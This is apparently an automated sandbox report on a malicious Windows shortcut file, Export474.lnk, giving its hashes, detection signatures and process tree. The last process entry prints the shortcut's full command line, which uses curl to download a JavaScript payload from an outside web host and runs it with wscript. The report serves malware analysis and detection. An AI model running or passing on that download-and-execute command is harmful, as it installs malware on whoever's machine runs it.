Analysis
-
max time kernel
41s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
08-09-2022 18:56
Static task
static1
Behavioral task
behavioral1
Sample
Export474.lnk
Resource
win7-20220812-en
windows7-x64
2 signatures
150 seconds
General
-
Target
Export474.lnk
-
Size
2KB
-
MD5
e3bd2b8ab3b2aa72f21d6b1aea8dd4e0
-
SHA1
279b748f40cc8377d63b630c756c60644e9be89e
-
SHA256
77fe3b85503872e252ee98f49c1491d7dfc7cb3579ff3771bd7ad59f68c0dc60
-
SHA512
6aea0405c1eb507611c9ee21ac0ba0b8c2a719653ee1b644e015608ee5d3dae6a706f9b328b26ff3961cd7b690a9dfe1e6f6e30405d78c11efa08711f59b55cb
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1416 wrote to memory of 968 1416 cmd.exe cmd.exe PID 1416 wrote to memory of 968 1416 cmd.exe cmd.exe PID 1416 wrote to memory of 968 1416 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Export474.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"2⤵